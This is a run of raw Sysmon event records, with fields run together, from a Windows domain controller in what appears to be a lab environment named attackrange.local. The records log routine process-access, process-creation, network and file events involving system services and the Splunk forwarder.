12:03:05.434{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.434{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.434{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.434{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.434{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.434{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.060{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F8-6064-0A01-00000000AE01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.060{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.060{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.060{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.060{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.060{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F8-6064-0A01-00000000AE01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.060{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F8-6064-0A01-00000000AE01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.920{266CAFBE-64F8-6064-0A01-00000000AE01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.852{266CAFBE-64FA-6064-0D01-00000000AE01}63246316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000008667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.993{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53603-false10.0.1.12-8000- 11241100x80000000000000008666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.681{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeC:\Users\Administrator\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat2021-03-31 12:03:06.681 10341000x80000000000000008665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.681{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64FA-6064-0D01-00000000AE01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.681{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.681{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.681{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.681{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.681{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64FA-6064-0D01-00000000AE01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.681{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64FA-6064-0D01-00000000AE01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.541{266CAFBE-64FA-6064-0D01-00000000AE01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.353{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-64FA-6064-0C01-00000000AE01}4480C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.353{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64FA-6064-0C01-00000000AE01}4480C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.338{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64FA-6064-0C01-00000000AE01}4480C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.338{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64FA-6064-0C01-00000000AE01}4480C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.338{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64FA-6064-0C01-00000000AE01}4480C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 